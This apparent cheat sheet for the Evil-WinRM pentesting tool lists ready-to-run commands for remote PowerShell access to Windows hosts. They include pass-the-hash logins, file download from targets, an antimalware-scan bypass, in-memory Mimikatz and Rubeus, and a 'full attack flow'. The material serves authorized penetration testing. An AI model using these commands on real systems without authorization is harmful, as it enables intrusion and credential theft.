Description
Evil-WinRM is the ultimate WinRM shell for hacking and pentesting. It features command execution, PowerShell, file transfer, and dll/exe in-memory loading on Windows targets with WinRM enabled (port 5985/5986).
Installation
BASH
gem install evil-winrm
# Or
sudo apt install evil-winrmBasic Usage
BASH
# Password auth
evil-winrm -i <IP> -u user -p 'password'
# Pass-the-Hash
evil-winrm -i <IP> -u admin -H 'NTLM_HASH'
# With SSL (port 5986)
evil-winrm -i <IP> -u user -p 'password' -SAdvanced Usage
BASH
# Upload/download files
*Evil-WinRM* PS> upload /local/file.exe C:\temp\file.exe
*Evil-WinRM* PS> download C:\temp\secret.txt /local/secret.txt
# Load PowerShell scripts
evil-winrm -i <IP> -u user -p 'password' -s /scripts/
*Evil-WinRM* PS> menu
*Evil-WinRM* PS> Invoke-Mimikatz
# Load C# binaries in memory
evil-winrm -i <IP> -u user -p 'password' -e /executables/
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary /executables/Rubeus.exe
# With Kerberos
evil-winrm -i <IP> -r DOMAIN.LOCALCommon Workflows
BASH
# Full attack flow
evil-winrm -i <IP> -u admin -H 'HASH' -s /tools/ -e /binaries/
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> upload winPEAS.exe
*Evil-WinRM* PS> .\winPEAS.exe